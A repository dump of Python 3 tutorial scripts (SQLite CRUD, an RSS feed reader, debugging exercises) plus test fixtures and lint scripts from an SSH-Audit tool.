i1 = ? 
where t1 = ?'.format(self._table), 26 | (row['i1'], row['t1'])) 27 | self._db.commit() 28 | 29 | def delete(self, key): 30 | self._db.execute('delete from {} where t1 = ?'.format(self._table), (key,)) 31 | self._db.commit() 32 | 33 | def disp_rows(self): 34 | cursor = self._db.execute('select * from {} order by t1'.format(self._table)) 35 | for row in cursor: 36 | print(' {}: {}'.format(row['t1'], row['i1'])) 37 | 38 | def __iter__(self): 39 | cursor = self._db.execute('select * from {} order by t1'.format(self._table)) 40 | for row in cursor: 41 | yield dict(row) 42 | 43 | @property 44 | def filename(self): return self._filename 45 | 46 | @filename.setter 47 | def filename(self, fn): 48 | self._filename = fn 49 | self._db = sqlite3.connect(fn) 50 | self._db.row_factory = sqlite3.Row 51 | 52 | @filename.deleter 53 | def filename(self): self.close() 54 | 55 | @property 56 | def table(self): return self._table 57 | @table.setter 58 | def table(self, t): self._table = t 59 | @table.deleter 60 | def table(self): self._table = 'test' 61 | 62 | def close(self): 63 | self._db.close() 64 | del self._filename 65 | 66 | def main(): 67 | db = database(filename = 'test.db', table = 'test') 68 | 69 | print('Create table test') 70 | db.sql_do('drop table if exists test') 71 | db.sql_do('create table test ( t1 text, i1 int )') 72 | 73 | print('Create rows') 74 | db.insert(dict(t1 = 'one', i1 = 1)) 75 | db.insert(dict(t1 = 'two', i1 = 2)) 76 | db.insert(dict(t1 = 'three', i1 = 3)) 77 | db.insert(dict(t1 = 'four', i1 = 4)) 78 | for row in db: print(row) 79 | 80 | print('Retrieve rows') 81 | print(db.retrieve('one'), db.retrieve('two')) 82 | 83 | print('Update rows') 84 | db.update(dict(t1 = 'one', i1 = 101)) 85 | db.update(dict(t1 = 'three', i1 = 103)) 86 | for row in db: print(row) 87 | 88 | print('Delete rows') 89 | db.delete('one') 90 | db.delete('three') 91 | for row in db: print(row) 92 | 93 | if __name__ == "__main__": main() 94 | 
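# -------------------------------------------------------------------------------- /Python_3_Tutorials/16 Databases/sqlite3-crud.py: --------------------------------------------------------------------------------
#!/usr/bin/python3
"""Minimal SQLite CRUD walkthrough against a two-column ``test`` table.

Every statement that carries a caller-supplied value binds it through a
``?`` placeholder, so values are passed to SQLite as parameters and are
never formatted into the SQL text.
"""
__author__ = "Santhosh Baswa"

import sqlite3


def insert(db, row):
    """Insert one row into ``test`` and commit.

    Args:
        db: an open sqlite3 connection.
        row: mapping with the keys ``t1`` (text) and ``i1`` (int).
    """
    db.execute('insert into test (t1, i1) values (?, ?)', (row['t1'], row['i1']))
    db.commit()


def retrieve(db, t1):
    """Return the first row whose ``t1`` equals *t1*, or None if there is none."""
    cursor = db.execute('select * from test where t1 = ?', (t1,))
    return cursor.fetchone()


def update(db, row):
    """Set ``i1`` on the row(s) matching ``row['t1']`` and commit."""
    db.execute('update test set i1 = ? where t1 = ?', (row['i1'], row['t1']))
    db.commit()


def delete(db, t1):
    """Delete the row(s) whose ``t1`` equals *t1* and commit."""
    db.execute('delete from test where t1 = ?', (t1,))
    db.commit()


def disp_rows(db):
    """Print every row ordered by ``t1``.

    Rows are indexed by column name, so the connection's ``row_factory``
    must be ``sqlite3.Row`` (main() sets it).
    """
    cursor = db.execute('select * from test order by t1')
    for row in cursor:
        print('  {}: {}'.format(row['t1'], row['i1']))


def main():
    """Recreate ``test`` in test.db and run each CRUD helper once."""
    db = sqlite3.connect('test.db')
    # The original never closed the connection; release it even when a
    # statement raises.
    try:
        db.row_factory = sqlite3.Row
        print('Create table test')
        db.execute('drop table if exists test')
        db.execute('create table test ( t1 text, i1 int )')

        print('Create rows')
        insert(db, dict(t1 = 'one', i1 = 1))
        insert(db, dict(t1 = 'two', i1 = 2))
        insert(db, dict(t1 = 'three', i1 = 3))
        insert(db, dict(t1 = 'four', i1 = 4))
        disp_rows(db)

        print('Retrieve rows')
        print(dict(retrieve(db, 'one')), dict(retrieve(db, 'two')))

        print('Update rows')
        update(db, dict(t1 = 'one', i1 = 101))
        update(db, dict(t1 = 'three', i1 = 103))
        disp_rows(db)

        print('Delete rows')
        delete(db, 'one')
        delete(db, 'three')
        disp_rows(db)
    finally:
        db.close()


if __name__ == "__main__": main()
# -------------------------------------------------------------------------------- /Python_3_Tutorials/17 Modules/modules.py: -------------------------------------------------------------------------------- 1 |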
#!/usr/bin/python3 2 | __author__ = "Santhosh Baswa" 3 | 4 | import sys 5 | 6 | def main(): 7 | print('Python version {}.{}.{}'.format(*sys.version_info)) 8 | 9 | if __name__ == "__main__": main() 10 | -------------------------------------------------------------------------------- /Python_3_Tutorials/17 Modules/saytime.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/P3t3rp4rk3r/My_Dirty_Scripts/763a00dcdd6e77c456e33f288495297000d3bb7a/Python_3_Tutorials/17 Modules/saytime.pyc -------------------------------------------------------------------------------- /Python_3_Tutorials/17 Modules/web-saytime.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | __author__ = "Santhosh Baswa" 3 | 4 | import time, saytime 5 | 6 | t = time.localtime() 7 | print("Content-type: text/html\n") 8 | print( 9 | "In Phoenix, Arizona, it is now " + 10 | saytime.saytime_t(t).words() + 11 | time.strftime(', on %A, %d %B %Y.') 12 | ) 13 | 14 | 15 | -------------------------------------------------------------------------------- /Python_3_Tutorials/18 Debugging/incrange-errors.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python3 2 | __author__ = "Santhosh Baswa" 3 | 4 | class inclusive_range: 5 | def __init__(self, *args): 6 | numargs = len(args) 7 | if numargs < 1: raise TypeError('Requires at least one argument') 8 | elif numargs == 1: 9 | self.start = 0 10 | self.stop = args[0] 11 | self.step = 1 12 | elif numargs == 2: 13 | (self.start, self.stop) = args 14 | step = 1 15 | elif numargs == 3: 16 | (self.step, self.stop, self.start) = args 17 | else: raise TypeError('inclusiveRange expected at most 3 arguments, got {}'.format(numargs)) 18 | 19 | def __iter__(self): 20 | i = self.start 21 | while i >= self.stop: 22 | yield i 23 | i += self.step 24 | 25 | def main(): 26 | o = inclusive_range(4, 25, 3) 27 | 
for i in o: print(i, end = ' ') 28 | 29 | if __name__ == "__main__": main() 30 | -------------------------------------------------------------------------------- /Python_3_Tutorials/18 Debugging/mvc-errors.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python3 2 | __author__ = "Santhosh Baswa" 3 | 4 | # -- CONTROLLER -- 5 | 6 | class AnimalActions: 7 | def bark(self): return self._doAction('bark') 8 | def fur(self): return self._doAction('fur') 9 | def quack(self): return self._doAction('quack') 10 | def feathers(self): return self._doAction('feathers') 11 | 12 | def _doAction(self, action): 13 | if action in self.strings: 14 | return self.strings[action] 15 | else: 16 | return 'The {} has no {}'.format(self.animalName(), action) 17 | 18 | def animalName(self): 19 | return self.__class__.__name__.lower() 20 | 21 | # -- MODEL -- 22 | 23 | class Duck(AnimalActions): 24 | strings = dict( 25 | quack = "Quaaaaak!", 26 | faethers = "The duck has gray and white feathers." 27 | ) 28 | 29 | class Person(AnimalActions): 30 | strings = dict( 31 | bark = "The person says woof!", 32 | fur = "The person puts on a fur coat.", 33 | quack = "The person imitates a duck.", 34 | feathers = "The person takes a feather from the ground and shows it." 
35 | ) 36 | 37 | class Dog(AnimalActions): 38 | strings = dict( 39 | bark = "Arf!", 40 | fur = "The dog has white fur with black spots.", 41 | ) 42 | 43 | # -- VIEW -- 44 | 45 | def in_the_doghouse(dog): 46 | print(dog.bark()) 47 | print(dog.fur()) 48 | 49 | def in_the_forest(duck): 50 | print(duck.quack()) 51 | print(duck.feathers) 52 | 53 | def main(): 54 | donald = Duck() 55 | john = Person() 56 | fido = Dog() 57 | 58 | print("-- In the forest:") 59 | for o in ( donald, john, fido ): 60 | in_the_forest(o) 61 | 62 | print("-- In the doghouse:") 63 | for o in ( donald, john, fido ): 64 | in_the_doghouse(o) 65 | 66 | if __name__ == "__main__": main() 67 | -------------------------------------------------------------------------------- /Python_3_Tutorials/18 Debugging/test-saytime.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python3 2 | __author__ = "Santhosh Baswa" 3 | 4 | import saytime 5 | import unittest 6 | 7 | class TestSaytime(unittest.TestCase): 8 | def setUp(self): 9 | self.nums = list(range(11)) 10 | 11 | def test_numbers(self): 12 | # make sure the numbers translate correctly 13 | words = ( 14 | 'oh', 'one', 'two', 'three', 'four', 'five', 15 | 'six', 'seven', 'eight', 'nine', 'ten' 16 | ) 17 | for i, n in enumerate(self.nums): 18 | self.assertEqual(saytime.numwords(n).numwords(), words[i]) 19 | 20 | def test_time(self): 21 | time_tuples = ( 22 | (0, 0), (0, 1), (11, 0), (12, 0), (13, 0), (12, 29), (12, 30), 23 | (12, 31), (12, 15), (12, 30), (12, 45), (11, 59), (23, 15), 24 | (23, 59), (12, 59), (13, 59), (1, 60), (24, 0) 25 | ) 26 | time_words = ( 27 | "midnight", 28 | "one past midnight", 29 | "eleven o'clock", 30 | "noon", 31 | "one o'clock", 32 | "twenty-nine past noon", 33 | "half past noon", 34 | "twenty-nine til one", 35 | "quarter past noon", 36 | "half past noon", 37 | "quarter til one", 38 | "one til noon", 39 | "quarter past eleven", 40 | "one til midnight", 41 | "one til one", 42 | "one 
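til two", 43 | "OOR", 44 | "OOR" 45 | ) 46 | for i, t in enumerate(time_tuples): 47 | self.assertEqual(saytime.saytime(*t).words(), time_words[i]) 48 | 49 | if __name__ == "__main__": unittest.main() 50 | -------------------------------------------------------------------------------- /Python_3_Tutorials/19 Projects/Extras/RSS/rss.db: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/P3t3rp4rk3r/My_Dirty_Scripts/763a00dcdd6e77c456e33f288495297000d3bb7a/Python_3_Tutorials/19 Projects/Extras/RSS/rss.db
# -------------------------------------------------------------------------------- /Python_3_Tutorials/19 Projects/Extras/RSS/rss.py: --------------------------------------------------------------------------------
#!/usr/bin/python3
__author__ = "Santhosh Baswa"

from xml.dom.minidom import parse
from urllib.request import urlopen
from html.parser import HTMLParser

DEFAULT_NAMESPACES = (
    None, # RSS 09.1, 0.92, 0.93, 0.94, 2.0
    'http://purl.org/rss/1.0/', # RSS 1.0
    'http://my.netscape.com/rdf/simple/0.9/', # RSS 0.90
    'http://www.w3.org/2005/Atom', # ATOM
    'http://purl.org/dc/elements/1.1/' # dublin core namespace
)

class HTMLDataOnly(HTMLParser):
    ''' only gets data (text) from HTML -- no tags!

    This reduces markup to plain text for display. It is not an HTML
    sanitizer: escape the result again before placing it in HTML.
    '''
    def __init__(self, *args, **kwargs):
        super().__init__(*args, **kwargs)
        # None until the first text chunk arrives, so get_data() is safe on
        # input that contains tags only.
        self._data = None

    def handle_data(self, data):
        # The original tested hasattr(self, 'data'), which is never true, so
        # each chunk overwrote the previous one. Accumulate instead.
        self._data = data if self._data is None else ' '.join([self._data, data])

    def get_data(self):
        ''' text collected so far, chunks joined by single spaces ('' if none) '''
        return self._data if self._data is not None else ''

class RSS:
    ''' Read-only view of an RSS or Atom feed fetched from a URL.

    Everything this class returns (titles, links, descriptions) is text
    chosen by whoever controls the feed. Treat it as untrusted input when
    it is stored, rendered, or opened as a link.
    '''
    def __init__(self, url):
        # NOTE(review): urlopen() accepts more than http(s), for example
        # file: URLs, and is called here with no timeout and no size limit.
        # If url can come from a user, check its scheme and host first.
        # NOTE(review): the xml package documentation warns that
        # xml.dom.minidom is not hardened against maliciously constructed
        # documents; for feeds from untrusted sources a hardened parser such
        # as the defusedxml package is the usual recommendation.
        with urlopen(url) as response:      # close the HTTP response after parsing
            self.feed = parse(response)

        # rss or atom?
        self.node = []
        for t in ('item', 'entry'):
            self.node = self.getElementsByTagName(self.feed, t)
            if self.node: break

        self.feedTitle = self.textOf(self.first(self.feed, 'title'))
        self.feedDescription = self.textOf(self.first(self.feed, 'description'))
        self.feedURL = url
        self._index = 0

    def next_index(self, i = None):
        ''' Move the cursor and return it; None means "no current item".

        With no argument the cursor advances by one, a negative i clears
        it, any other i is used as the new position. A position at or past
        the last item also yields None.
        '''
        print("next_index", self._index)
        if i is None:
            # An exhausted cursor stays exhausted (the original raised
            # TypeError on None += 1).
            if self._index is not None: self._index += 1
        elif i < 0: self._index = None
        else: self._index = i
        # Guard the comparison: None >= int raises TypeError on Python 3.
        if self._index is not None and self._index >= len(self.node):
            self._index = None
        return self._index

    def title(self, n = None):
        ''' title text of item n (default: the current item) '''
        return self.textOfNode('title', n).strip()

    # atom uses an href attribute for the link
    def link(self, n = None):
        ''' link of item n: the element text, else the href attribute '''
        if n is None: n = self.node[self._index]
        l = self.textOfNode('link', n).strip()
        return l if l else self.attrOf(n, 'link', 'href').strip()

    def description(self, n = None):
        ''' description (or summary) of item n with the HTML tags removed '''
        htmldata = HTMLDataOnly()
        for t in ('description', 'summary'):
            text = self.textOfNode(t, n)
            if text:
                htmldata.feed(text)
                htmldata.close()    # flush text the parser may still be buffering
                return htmldata.get_data().strip()
        return ''

    def date(self):
        ''' date or pubDate text of the current item; None if neither is set '''
        for t in ('date', 'pubDate'):
            s = self.textOfNode(t)
            if s: return s

    def getElementsByTagName(self, node, tagName, possibleNamespaces=DEFAULT_NAMESPACES):
        ''' elements named tagName under node, from the first namespace that has any '''
        for namespace in possibleNamespaces:
            children = node.getElementsByTagNameNS(namespace, tagName)
            if len(children): return children
        return []

    def first(self, node, tagName, possibleNamespaces=DEFAULT_NAMESPACES):
        ''' first element named tagName under node, or None '''
        children = self.getElementsByTagName(node, tagName, possibleNamespaces)
        return children[0] if len(children) else None

    def attrOf(self, node, element, attr):
        ''' attribute attr of the first such element under node, or '' '''
        n = self.first(node, element)
        return n.getAttribute(attr) if n else ''

    def textOf(self, node):
        ''' concatenated text and CDATA children of node ('' for None) '''
        if not node: return ''
        # Only text-like children carry the content; element children (for
        # example inside an XHTML title) have no .data and used to raise
        # AttributeError here.
        wanted = (node.TEXT_NODE, node.CDATA_SECTION_NODE)
        return ''.join([child.data for child in node.childNodes if child.nodeType in wanted])

    def textOfNode(self, tagName, n = None):
        ''' text of the first tagName element under item n (default: current item) '''
        if n is None: n = self.node[self._index]
        return self.textOf(self.first(n, tagName))

    def record(self, n):
        ''' item n as a dict with the keys title, link, description, index '''
        return {
            'title': self.title(n),
            'link': self.link(n),
            'description': self.description(n),
            'index': self.node.index(n)
        }

    def records(self):
        ''' yield record(n) for every item in the feed '''
        for n in self.node:
            yield self.record(n)

def main():
    # These sample feeds are fetched over plain HTTP, so their content is
    # not protected in transit.
    for url in (
        'http://feeds.nytimes.com/nyt/rss/Books',
        'http://billweinman.wordpress.com/feed/',
        'http://perlhacks.com/atom.xml'
    ):
        rss = RSS(url)
        for r in rss.records():
            print("node {} of {}".format(r['index'] + 1, len(rss.node)))
            print(r['title'])
            print(r['link'])
            print(r['description'])

if __name__ == "__main__": main()
-------------------------------------------------------------------------------- /Python_3_Tutorials/19 Projects/Extras/RSS/rss.py~: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python3 2 | __author__ = "Santhosh Baswa" 3 | 4 | from xml.dom.minidom import parse 5 | from urllib.request import urlopen 6 | from html.parser import HTMLParser 7 | 8 | DEFAULT_NAMESPACES = ( 9 | None, # RSS 09.1, 0.92, 0.93, 0.94, 2.0 10 | 'http://purl.org/rss/1.0/', # RSS 1.0 11 | 'http://my.netscape.com/rdf/simple/0.9/', # RSS 0.90 12 | 'http://www.w3.org/2005/Atom', # ATOM 13 | 'http://purl.org/dc/elements/1.1/' # dublin core namespace 14 | ) 15 | 16 | class HTMLDataOnly(HTMLParser): 17 | ''' only gets data (text) from HTML -- no tags! ''' 18 | def handle_data(self, data): 19 | self._data = ' '.join([self._data, data]) if hasattr(self, 'data') else data 20 | def get_data(self): 21 | return self._data 22 | 23 | class RSS: 24 | def __init__(self, url): 25 | self.feed = parse(urlopen(url)) 26 | 27 | # rss or atom? 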
28 | for t in ('item', 'entry'): 29 | self.node = self.getElementsByTagName(self.feed, t) 30 | if self.node: break 31 | 32 | self.feedTitle = self.textOf(self.first(self.feed, 'title')) 33 | self.feedDescription = self.textOf(self.first(self.feed, 'description')) 34 | self.feedURL = url 35 | self._index = 0; 36 | 37 | def next_index(self, i = None): 38 | print("next_index", self._index) 39 | if i is None: self._index += 1 40 | elif i < 0: self._index = None 41 | else: self._index = i 42 | if self._index >= len(self.node): self._index = None 43 | return self._index 44 | 45 | def title(self, n = None): 46 | return self.textOfNode('title', n).strip() 47 | 48 | # atom uses an href attribute for the link 49 | def link(self, n = None): 50 | if n is None: n = self.node[self._index] 51 | l = self.textOfNode('link', n).strip() 52 | return l if l else self.attrOf(n, 'link', 'href').strip() 53 | 54 | def description(self, n = None): 55 | htmldata = HTMLDataOnly() 56 | for t in ('description', 'summary'): 57 | text = self.textOfNode(t, n) 58 | if text: 59 | htmldata.feed(text) 60 | return htmldata.get_data().strip() 61 | return '' 62 | 63 | def date(self): 64 | for t in ('date', 'pubDate'): 65 | s = self.textOfNode(t) 66 | if s: return s 67 | 68 | def getElementsByTagName(self, node, tagName, possibleNamespaces=DEFAULT_NAMESPACES): 69 | for namespace in possibleNamespaces: 70 | children = node.getElementsByTagNameNS(namespace, tagName) 71 | if len(children): return children 72 | return [] 73 | 74 | def first(self, node, tagName, possibleNamespaces=DEFAULT_NAMESPACES): 75 | children = self.getElementsByTagName(node, tagName, possibleNamespaces) 76 | return children[0] if len(children) else None 77 | 78 | def attrOf(self, node, element, attr): 79 | n = self.first(node, element) 80 | return n.getAttribute(attr) if n else '' 81 | 82 | def textOf(self, node): 83 | return ''.join([child.data for child in node.childNodes]) if node else '' 84 | 85 | def textOfNode(self, tagName, n = 
None): 86 | if n is None: n = self.node[self._index] 87 | return self.textOf(self.first(n, tagName)) 88 | 89 | def record(self, n): 90 | return { 91 | 'title': self.title(n), 92 | 'link': self.link(n), 93 | 'description': self.description(n), 94 | 'index': self.node.index(n) 95 | } 96 | 97 | def records(self): 98 | for n in self.node: 99 | yield self.record(n) 100 | 101 | def main(): 102 | for url in ( 103 | 'http://feeds.nytimes.com/nyt/rss/Books', 104 | 'http://billweinman.wordpress.com/feed/', 105 | 'http://perlhacks.com/atom.xml' 106 | ): 107 | rss = RSS(url) 108 | for r in rss.records(): 109 | print("node {} of {}".format(r['index'] + 1, len(rss.node))) 110 | print(r['title']) 111 | print(r['link']) 112 | print(r['description']) 113 | 114 | if __name__ == "__main__": main() 115 | -------------------------------------------------------------------------------- /Python_3_Tutorials/19 Projects/Extras/RSS/rssdb.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python3 2 | __author__ = "Santhosh Baswa" 3 | 4 | import sqlite3 5 | 6 | _DBFILE = 'rss.db' 7 | 8 | class rssDB: 9 | def __init__(self): 10 | self._db = sqlite3.connect(_DBFILE) 11 | self._db.row_factory = sqlite3.Row 12 | self._db.execute(''' 13 | CREATE TABLE IF NOT EXISTS feed ( 14 | id INTEGER PRIMARY KEY, 15 | url TEXT UNIQUE, 16 | title TEXT, 17 | description TEXT 18 | ) 19 | ''') 20 | 21 | def insert(self, rec): 22 | self._db.execute(''' 23 | INSERT into feed (url, title, description) 24 | VALUES (:url, :title, :description) 25 | ''', rec) 26 | self._db.commit() 27 | 28 | def getByURL(self, url): 29 | c = self._db.cursor() 30 | c.execute('SELECT * FROM feed WHERE url = ?', (url,)) 31 | return c.fetchone() 32 | 33 | def getById(self, id): 34 | c = self._db.cursor() 35 | c.execute('SELECT * FROM feed WHERE id = ?', (id,)) 36 | return c.fetchone() 37 | 38 | def update(self, rec): 39 | self._db.execute(''' 40 | UPDATE feed 41 | SET title = :title, 
description = :description 42 | WHERE url = :url 43 | ''', rec ) 44 | self._db.commit() 45 | 46 | def delById(self, id): 47 | self._db.execute('DELETE from feed WHERE id = ?', (id,)) 48 | self._db.commit() 49 | 50 | def list(self): 51 | c = self._db.cursor() 52 | c.execute('SELECT * FROM feed ORDER BY UPPER(title)') 53 | for r in c: 54 | yield r; 55 | 56 | def main(): 57 | db = rssDB() 58 | print('all recs from {}:'.format(_DBFILE)) 59 | for r in db.list(): 60 | print('{title} [{url}] {description}'.format(**r)) 61 | 62 | if __name__=='__main__': main() 63 | -------------------------------------------------------------------------------- /Python_3_Tutorials/19 Projects/Extras/RSS/rssdb.py~: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python3 2 | # template.py by Bill Weinman [http://bw.org/] 3 | # created for Python 3 Essential Training on lynda.com 4 | # Copyright 2010 The BearHeart Gorup, LLC 5 | import sqlite3 6 | 7 | _DBFILE = 'rss.db' 8 | 9 | class rssDB: 10 | def __init__(self): 11 | self._db = sqlite3.connect(_DBFILE) 12 | self._db.row_factory = sqlite3.Row 13 | self._db.execute(''' 14 | CREATE TABLE IF NOT EXISTS feed ( 15 | id INTEGER PRIMARY KEY, 16 | url TEXT UNIQUE, 17 | title TEXT, 18 | description TEXT 19 | ) 20 | ''') 21 | 22 | def insert(self, rec): 23 | self._db.execute(''' 24 | INSERT into feed (url, title, description) 25 | VALUES (:url, :title, :description) 26 | ''', rec) 27 | self._db.commit() 28 | 29 | def getByURL(self, url): 30 | c = self._db.cursor() 31 | c.execute('SELECT * FROM feed WHERE url = ?', (url,)) 32 | return c.fetchone() 33 | 34 | def getById(self, id): 35 | c = self._db.cursor() 36 | c.execute('SELECT * FROM feed WHERE id = ?', (id,)) 37 | return c.fetchone() 38 | 39 | def update(self, rec): 40 | self._db.execute(''' 41 | UPDATE feed 42 | SET title = :title, description = :description 43 | WHERE url = :url 44 | ''', rec ) 45 | self._db.commit() 46 | 47 | def delById(self, 
id): 48 | self._db.execute('DELETE from feed WHERE id = ?', (id,)) 49 | self._db.commit() 50 | 51 | def list(self): 52 | c = self._db.cursor() 53 | c.execute('SELECT * FROM feed ORDER BY UPPER(title)') 54 | for r in c: 55 | yield r; 56 | 57 | def main(): 58 | db = rssDB() 59 | print('all recs from {}:'.format(_DBFILE)) 60 | for r in db.list(): 61 | print('{title} [{url}] {description}'.format(**r)) 62 | 63 | if __name__=='__main__': main() 64 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # My-Dirty-Scripts 2 | # My-Dirty-Scripts 3 | # My_Dirty_Scripts 4 | -------------------------------------------------------------------------------- /SSH-Audit/LICENSE: -------------------------------------------------------------------------------- 1 | The MIT License (MIT) 2 | 3 | Copyright (C) 2016 Andris Raugulis (moo@arthepsy.eu) 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. 
IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. 22 | -------------------------------------------------------------------------------- /SSH-Audit/test/conftest.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # -*- coding: utf-8 -*- 3 | import os 4 | import io 5 | import sys 6 | import socket 7 | import pytest 8 | 9 | 10 | if sys.version_info[0] == 2: 11 | import StringIO # pylint: disable=import-error 12 | StringIO = StringIO.StringIO 13 | else: 14 | StringIO = io.StringIO 15 | 16 | 17 | @pytest.fixture(scope='module') 18 | def ssh_audit(): 19 | __rdir = os.path.join(os.path.dirname(os.path.abspath(__file__)), '..') 20 | sys.path.append(os.path.abspath(__rdir)) 21 | return __import__('ssh-audit') 22 | 23 | 24 | # pylint: disable=attribute-defined-outside-init 25 | class _OutputSpy(list): 26 | def begin(self): 27 | self.__out = StringIO() 28 | self.__old_stdout = sys.stdout 29 | sys.stdout = self.__out 30 | 31 | def flush(self): 32 | lines = self.__out.getvalue().splitlines() 33 | sys.stdout = self.__old_stdout 34 | self.__out = None 35 | return lines 36 | 37 | 38 | @pytest.fixture(scope='module') 39 | def output_spy(): 40 | return _OutputSpy() 41 | 42 | 43 | class _VirtualSocket(object): 44 | def __init__(self): 45 | self.sock_address = ('127.0.0.1', 0) 46 | self.peer_address = None 47 | self._connected = False 48 | self.timeout = -1.0 49 | self.rdata = [] 50 | self.sdata = [] 51 | self.errors = {} 52 | 53 | def _check_err(self, method): 54 | method_error = self.errors.get(method) 55 | if method_error: 56 | raise method_error 57 | 58 | def connect(self, address): 59 | return self._connect(address, False) 60 | 61 | def _connect(self, address, ret=True): 62 | 
self.peer_address = address 63 | self._connected = True 64 | self._check_err('connect') 65 | return self if ret else None 66 | 67 | def settimeout(self, timeout): 68 | self.timeout = timeout 69 | 70 | def gettimeout(self): 71 | return self.timeout 72 | 73 | def getpeername(self): 74 | if self.peer_address is None or not self._connected: 75 | raise socket.error(57, 'Socket is not connected') 76 | return self.peer_address 77 | 78 | def getsockname(self): 79 | return self.sock_address 80 | 81 | def bind(self, address): 82 | self.sock_address = address 83 | 84 | def listen(self, backlog): 85 | pass 86 | 87 | def accept(self): 88 | # pylint: disable=protected-access 89 | conn = _VirtualSocket() 90 | conn.sock_address = self.sock_address 91 | conn.peer_address = ('127.0.0.1', 0) 92 | conn._connected = True 93 | return conn, conn.peer_address 94 | 95 | def recv(self, bufsize, flags=0): 96 | # pylint: disable=unused-argument 97 | if not self._connected: 98 | raise socket.error(54, 'Connection reset by peer') 99 | if not len(self.rdata) > 0: 100 | return b'' 101 | data = self.rdata.pop(0) 102 | if isinstance(data, Exception): 103 | raise data 104 | return data 105 | 106 | def send(self, data): 107 | if self.peer_address is None or not self._connected: 108 | raise socket.error(32, 'Broken pipe') 109 | self._check_err('send') 110 | self.sdata.append(data) 111 | 112 | 113 | @pytest.fixture() 114 | def virtual_socket(monkeypatch): 115 | vsocket = _VirtualSocket() 116 | 117 | # pylint: disable=unused-argument 118 | def _socket(family=socket.AF_INET, 119 | socktype=socket.SOCK_STREAM, 120 | proto=0, 121 | fileno=None): 122 | return vsocket 123 | 124 | def _cc(address, timeout=0, source_address=None): 125 | # pylint: disable=protected-access 126 | return vsocket._connect(address, True) 127 | 128 | monkeypatch.setattr(socket, 'create_connection', _cc) 129 | monkeypatch.setattr(socket, 'socket', _socket) 130 | return vsocket 131 | 
-------------------------------------------------------------------------------- /SSH-Audit/test/coverage.sh: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | _cdir=$(cd -- "$(dirname "$0")" && pwd) 3 | type py.test > /dev/null 2>&1 4 | if [ $? -ne 0 ]; then 5 | echo "err: py.test (Python testing framework) not found." 6 | exit 1 7 | fi 8 | cd -- "${_cdir}/.." 9 | mkdir -p html 10 | py.test -v --cov-report=html:html/coverage --cov=ssh-audit test 11 | -------------------------------------------------------------------------------- /SSH-Audit/test/mypy-py2.sh: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | _cdir=$(cd -- "$(dirname "$0")" && pwd) 3 | type mypy > /dev/null 2>&1 4 | if [ $? -ne 0 ]; then 5 | echo "err: mypy (Optional Static Typing for Python) not found." 6 | exit 1 7 | fi 8 | _htmldir="${_cdir}/../html/mypy-py2" 9 | mkdir -p "${_htmldir}" 10 | mypy --python-version 2.7 --config-file "${_cdir}/mypy.ini" --html-report "${_htmldir}" "${_cdir}/../ssh-audit.py" 11 | -------------------------------------------------------------------------------- /SSH-Audit/test/mypy-py3.sh: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | _cdir=$(cd -- "$(dirname "$0")" && pwd) 3 | type mypy > /dev/null 2>&1 4 | if [ $? -ne 0 ]; then 5 | echo "err: mypy (Optional Static Typing for Python) not found." 
6 | exit 1 7 | fi 8 | _htmldir="${_cdir}/../html/mypy-py3" 9 | mkdir -p "${_htmldir}" 10 | mypy --python-version 3.5 --config-file "${_cdir}/mypy.ini" --html-report "${_htmldir}" "${_cdir}/../ssh-audit.py" 11 | -------------------------------------------------------------------------------- /SSH-Audit/test/mypy.ini: -------------------------------------------------------------------------------- 1 | [mypy] 2 | silent_imports = True 3 | disallow_untyped_calls = True 4 | disallow_untyped_defs = True 5 | check_untyped_defs = True 6 | disallow-subclassing-any = True 7 | warn-incomplete-stub = True 8 | warn-redundant-casts = True 9 | 10 | -------------------------------------------------------------------------------- /SSH-Audit/test/prospector.sh: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | _cdir=$(cd -- "$(dirname "$0")" && pwd) 3 | type prospector > /dev/null 2>&1 4 | if [ $? -ne 0 ]; then 5 | echo "err: prospector (Python Static Analysis) not found." 
